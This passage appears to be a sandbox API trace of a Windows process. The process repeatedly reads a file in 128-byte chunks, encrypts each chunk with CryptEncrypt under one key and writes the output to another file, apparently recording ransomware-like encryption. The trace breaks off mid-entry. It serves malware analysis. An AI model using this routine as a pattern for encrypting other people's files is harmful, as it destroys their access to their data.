[0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.230] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.231] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.232] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.232] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.232] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.232] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.232] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.256] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.256] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.256] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.256] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.256] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.256] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.257] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.257] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.257] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.257] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.257] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.257] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.257] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.257] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: 